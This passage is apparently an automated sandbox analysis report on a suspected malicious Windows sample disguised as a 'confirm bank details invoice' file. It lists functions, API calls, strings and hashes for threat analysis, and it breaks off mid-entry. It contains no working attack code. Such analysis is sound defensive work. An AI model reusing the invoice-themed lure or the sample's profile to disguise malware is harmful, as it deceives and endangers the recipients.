                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __itow__swprintf_xtow@16
                    • String ID: %.15g$0x%p$False$True
                    • API String ID: 1502193981-2263619337
                    • Opcode ID: ad8f3a0d6dac98c2e65bdd610d8744f5c1964b94abf229c85ebf0a62125518ff
                    • Instruction ID: 97ff93e2461f9b33db3fa4c5d398df94892a64cecb1e3f5c4cd418f608a1cd5c
                    • Opcode Fuzzy Hash: ad8f3a0d6dac98c2e65bdd610d8744f5c1964b94abf229c85ebf0a62125518ff
                    • Instruction Fuzzy Hash: EA41F531500205AFEB24AB75D942EAA77E4EF88314F20846FE54DC72D1EA39AD42CB19
                    Function 004DA1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                    Download Yara Rule
                    APIs
                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 004DA259
                    • CreateCompatibleDC.GDI32(00000000), ref: 004DA260
                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 004DA273
                    • SelectObject.GDI32(00000000,00000000), ref: 004DA27B
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 004DA286
                    • DeleteDC.GDI32(00000000), ref: 004DA28F
                    • GetWindowLongW.USER32(?,000000EC), ref: 004DA299
                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004DA2AD
                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004DA2B9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                    • String ID: static
                    • API String ID: 2559357485-2160076837
                    • Opcode ID: 05fed391cce42b960ec241394a4f6fe0e231b3c2d6db9b7680eb81c059d7735f
                    • Instruction ID: cf36318178eacfb12f98245d5c009f11a17c06b6c9f00da90cf5fd1e56fd6e68
                    • Opcode Fuzzy Hash: 05fed391cce42b960ec241394a4f6fe0e231b3c2d6db9b7680eb81c059d7735f
                    • Instruction Fuzzy Hash: 75319E31500114AFDF115FA5DC49FEB3B69FF0E364F100226FA19A62A0C739D821DBA9
                    Function 004B6F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                    • String ID: 0.0.0.0
                    • API String ID: 2620052-3771769585
                    • Opcode ID: 3a19e48a3387ce45a37619839fae5fad1812c298b5e94874cb07589c3934f8aa
                    • Instruction ID: d24e4d98f8b74fb1bab8176533d7159b693d1d511cc5dcdb912d6a62994433d2
                    • Opcode Fuzzy Hash: 3a19e48a3387ce45a37619839fae5fad1812c298b5e94874cb07589c3934f8aa
                    • Instruction Fuzzy Hash: 1D11D571904114AFDB147B65AC0AEFE7BACEF40714F05017AF10596181EE7C9A85DB68
                    Function 0049500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00495047
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    • __gmtime64_s.LIBCMT ref: 004950E0
                    • __gmtime64_s.LIBCMT ref: 00495116
                    • __gmtime64_s.LIBCMT ref: 00495133
                    • __allrem.LIBCMT ref: 00495189
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004951A5
                    • __allrem.LIBCMT ref: 004951BC
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004951DA
                    • __allrem.LIBCMT ref: 004951F1
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0049520F
                    • __invoke_watson.LIBCMT ref: 00495280
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                    • String ID:
                    • API String ID: 384356119-0
                    • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                    • Instruction ID: ad09b0678c3b99b7d685f3f75a9ef16fb6c7706fa8d38d0e1280ef3accc85d2a
                    • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                    • Instruction Fuzzy Hash: 68710472A00B16ABDF159F69CC42B5B7BA8AF11768F24423BE410D6281E778D9408BD8
                    Function 004B4DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 004B4DF8
                    • GetMenuItemInfoW.USER32(00531708,000000FF,00000000,00000030), ref: 004B4E59
                    • SetMenuItemInfoW.USER32(00531708,00000004,00000000,00000030), ref: 004B4E8F
                    • Sleep.KERNEL32(000001F4), ref: 004B4EA1
                    • GetMenuItemCount.USER32(?), ref: 004B4EE5
                    • GetMenuItemID.USER32(?,00000000), ref: 004B4F01
                    • GetMenuItemID.USER32(?,-00000001), ref: 004B4F2B
                    • GetMenuItemID.USER32(?,?), ref: 004B4F70
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004B4FB6
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004B4FCA
                    • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004B4FEB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                    • String ID:
                    • API String ID: 4176008265-0
                    • Opcode ID: cc9592df97da5de02e6c0782dd047bc1923227cba74367fe5514fbd73fd26ef8
                    • Instruction ID: 997a9e466f8722d1eda264f979d6beb9b63b2043dda08b6ecb53fd6eb9b77978
                    • Opcode Fuzzy Hash: cc9592df97da5de02e6c0782dd047bc1923227cba74367fe5514fbd73fd26ef8
                    • Instruction Fuzzy Hash: 58618E71900249AFDB21CFA4D888AFF7BB9EB85308F14015AF441A7252D738ED15DB39
                    Function 004D9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004D9C98
                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004D9C9B
                    • GetWindowLongW.USER32(?,000000F0), ref: 004D9CBF
                    • _memset.LIBCMT ref: 004D9CD0
                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004D9CE2
                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004D9D5A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$LongWindow_memset
                    • String ID:
                    • API String ID: 830647256-0
                    • Opcode ID: d36fc15d0324125b7e2869307d8fda0a42c09f591d71b57fd7637b2792e1a9bb
                    • Instruction ID: f1122a21fd5ecadca1f92adf0960128fb406df86c9e9bebb8a61e684b6616c93
                    • Opcode Fuzzy Hash: d36fc15d0324125b7e2869307d8fda0a42c09f591d71b57fd7637b2792e1a9bb
                    • Instruction Fuzzy Hash: B3617A75A00208AFDB10DFA8CC91EEE77B8EB09704F14415AFA05EB3A1D774AD46DB58
                    Function 004A94E1 Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                    Download Yara Rule
                    APIs
                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 004A94FE
                    • SafeArrayAllocData.OLEAUT32(?), ref: 004A9549
                    • VariantInit.OLEAUT32(?), ref: 004A955B
                    • SafeArrayAccessData.OLEAUT32(?,?), ref: 004A957B
                    • VariantCopy.OLEAUT32(?,?), ref: 004A95BE
                    • SafeArrayUnaccessData.OLEAUT32(?), ref: 004A95D2
                    • VariantClear.OLEAUT32(?), ref: 004A95E7
                    • SafeArrayDestroyData.OLEAUT32(?), ref: 004A95F4
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004A95FD
                    • VariantClear.OLEAUT32(?), ref: 004A960F
                    • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 004A961A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                    • String ID:
                    • API String ID: 2706829360-0
                    • Opcode ID: aa00e6f021ecdb5f10a2d0963dfdb81d130f3a49db237e7205eee4d6e15ef207
                    • Instruction ID: 61180e639df3ecf250c9b39a258c390a863b2ff6e7c6ed4f5878037ca2bb6670
                    • Opcode Fuzzy Hash: aa00e6f021ecdb5f10a2d0963dfdb81d130f3a49db237e7205eee4d6e15ef207
                    • Instruction Fuzzy Hash: FC416031D00219AFCB01EFA4DC849EEBBB9FF19354F00846AF501A7251DB34EA55CBA9
                    Function 004CBB08 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 264COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Variant$ClearInit$_memset
                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?R$|?R
                    • API String ID: 2862541840-2264138851
                    • Opcode ID: 22a22ca5cd0d940f2258fc220a15bab37473ea013d97a2f9ac3287e6597b8eff
                    • Instruction ID: 5b11abe58c54d6779694adc5ddf13d2fdfca7332111b551396742c5e2758da6f
                    • Opcode Fuzzy Hash: 22a22ca5cd0d940f2258fc220a15bab37473ea013d97a2f9ac3287e6597b8eff
                    • Instruction Fuzzy Hash: 0591BE75A00219ABDF60CF95D845FAFBBB8EF85310F10812EF516AB280D7789941CBE4
                    Function 004CADAE Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0047936C: __swprintf.LIBCMT ref: 004793AB
                      • Part of subcall function 0047936C: __itow.LIBCMT ref: 004793DF
                    • CoInitialize.OLE32 ref: 004CADF6
                    • CoUninitialize.OLE32 ref: 004CAE01
                    • CoCreateInstance.OLE32(?,00000000,00000017,004FD8FC,?), ref: 004CAE61
                    • IIDFromString.OLE32(?,?), ref: 004CAED4
                    • VariantInit.OLEAUT32(?), ref: 004CAF6E
                    • VariantClear.OLEAUT32(?), ref: 004CAFCF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                    • API String ID: 834269672-1287834457
                    • Opcode ID: c651f56bdc15ebc8e93dd245c55980f0f8d979b8294b383da98a5b84f3eb97e8
                    • Instruction ID: 27db50d015de79f202dd7f9a3210beea4a9c75ae11c9406aac9c24642a20b3ac
                    • Opcode Fuzzy Hash: c651f56bdc15ebc8e93dd245c55980f0f8d979b8294b383da98a5b84f3eb97e8
                    • Instruction Fuzzy Hash: F2619874608215AFC710EF64C848F6BBBE8AF49718F00441EF9859B291C778ED58CB9B
                    Function 004C8107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                    Download Yara Rule
                    APIs
                    • WSAStartup.WSOCK32(00000101,?), ref: 004C8168
                    • inet_addr.WSOCK32(?,?,?), ref: 004C81AD
                    • gethostbyname.WSOCK32(?), ref: 004C81B9
                    • IcmpCreateFile.IPHLPAPI ref: 004C81C7
                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004C8237
                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004C824D
                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004C82C2
                    • WSACleanup.WSOCK32 ref: 004C82C8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                    • String ID: Ping
                    • API String ID: 1028309954-2246546115
                    • Opcode ID: 099e08b9e1c7e677554c66982a675ba043e504be4115385813885069df79c1b9
                    • Instruction ID: d9286cc64250aaa602c9c6b65e300c61eafe307908b3b3d434d94dc07e53a0bd
                    • Opcode Fuzzy Hash: 099e08b9e1c7e677554c66982a675ba043e504be4115385813885069df79c1b9
                    • Instruction Fuzzy Hash: D851A1356046009FD760EF25CC89F6AB7E5EF48314F04886EF959DB2A1DB78E901CB4A
                    Function 004BE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 004BE396
                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 004BE40C
                    • GetLastError.KERNEL32 ref: 004BE416
                    • SetErrorMode.KERNEL32(00000000,READY), ref: 004BE483
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Error$Mode$DiskFreeLastSpace
                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                    • API String ID: 4194297153-14809454
                    • Opcode ID: 5596304401d93cf412b2ac8caed03f282f8aaa79ab0176f438f6f715e7e04eed
                    • Instruction ID: 6c45c27b48bdc6f961fc2642aa08058fae50b24e27faa902c794d9d8491691b7
                    • Opcode Fuzzy Hash: 5596304401d93cf412b2ac8caed03f282f8aaa79ab0176f438f6f715e7e04eed
                    • Instruction Fuzzy Hash: 6531C835A002059FDB00DF59D985AFEBBB4FF85304F14806BE505E7291DB789D02CB65
                    Function 004AB907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 004AB98C
                    • GetDlgCtrlID.USER32 ref: 004AB997
                    • GetParent.USER32 ref: 004AB9B3
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 004AB9B6
                    • GetDlgCtrlID.USER32(?), ref: 004AB9BF
                    • GetParent.USER32(?), ref: 004AB9DB
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 004AB9DE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent
                    • String ID: ComboBox$ListBox
                    • API String ID: 1383977212-1403004172
                    • Opcode ID: 3b50da34b83de08411deca963df9ed9e27c7aac7dd7a8b0e31ae632d0beaacca
                    • Instruction ID: 15aec7effe6380486227e9f793a5f6ac01510301cd6519721891a2c9aa2c357f
                    • Opcode Fuzzy Hash: 3b50da34b83de08411deca963df9ed9e27c7aac7dd7a8b0e31ae632d0beaacca
                    • Instruction Fuzzy Hash: 0221C4B4900104BFDB04ABA1DC85EFEBB79EF5A300F10411AF551972D2DB785825DB68
                    Function 004AB9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004ABA73
                    • GetDlgCtrlID.USER32 ref: 004ABA7E
                    • GetParent.USER32 ref: 004ABA9A
                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 004ABA9D
                    • GetDlgCtrlID.USER32(?), ref: 004ABAA6
                    • GetParent.USER32(?), ref: 004ABAC2
                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 004ABAC5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageSend$CtrlParent
                    • String ID: ComboBox$ListBox
                    • API String ID: 1383977212-1403004172
                    • Opcode ID: 68d17388a97cd475d14e9f3a6311acaa3fb31cbe2585f5aacc3097647faee5a6
                    • Instruction ID: a28b5fe0c65168efe04f7ec22aec5a69b1187fc7963b7a54349f913e3a4e521e
                    • Opcode Fuzzy Hash: 68d17388a97cd475d14e9f3a6311acaa3fb31cbe2585f5aacc3097647faee5a6
                    • Instruction Fuzzy Hash: 7121C574D00104BFDB01ABA4CC85EFEBB75EF56304F10401AF551D7292DBB95925DB68
                    Function 004ABAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetParent.USER32 ref: 004ABAE3
                    • GetClassNameW.USER32(00000000,?,00000100), ref: 004ABAF8
                    • _wcscmp.LIBCMT ref: 004ABB0A
                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004ABB85
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ClassMessageNameParentSend_wcscmp
                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                    • API String ID: 1704125052-3381328864
                    • Opcode ID: 0f69029bdcb04a56feb317c63541dea2dccc33ae44591245f1c7fce41f4ebec4
                    • Instruction ID: 0e0123283138cd35e79cce62306d1c15132222b9bdc36314abc216c195df8707
                    • Opcode Fuzzy Hash: 0f69029bdcb04a56feb317c63541dea2dccc33ae44591245f1c7fce41f4ebec4
                    • Instruction Fuzzy Hash: 9211C876608302F9FA106621AC06DA63B59DF22324F100027F904E58DAFBA96951456C
                    Function 004CB2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 004CB2D5
                    • CoInitialize.OLE32(00000000), ref: 004CB302
                    • CoUninitialize.OLE32 ref: 004CB30C
                    • GetRunningObjectTable.OLE32(00000000,?), ref: 004CB40C
                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 004CB539
                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 004CB56D
                    • CoGetObject.OLE32(?,00000000,004FD91C,?), ref: 004CB590
                    • SetErrorMode.KERNEL32(00000000), ref: 004CB5A3
                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004CB623
                    • VariantClear.OLEAUT32(004FD91C), ref: 004CB633
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                    • String ID:
                    • API String ID: 2395222682-0
                    • Opcode ID: 204e90fe3f352d6f0d253bfb1d1ef7f474ec1b9b5165598d358dc22f4a1f8937
                    • Instruction ID: 750d58700cfc1d4a543d5d41a0a792d2065a5c9a405dacf5e6b350d3c36882e5
                    • Opcode Fuzzy Hash: 204e90fe3f352d6f0d253bfb1d1ef7f474ec1b9b5165598d358dc22f4a1f8937
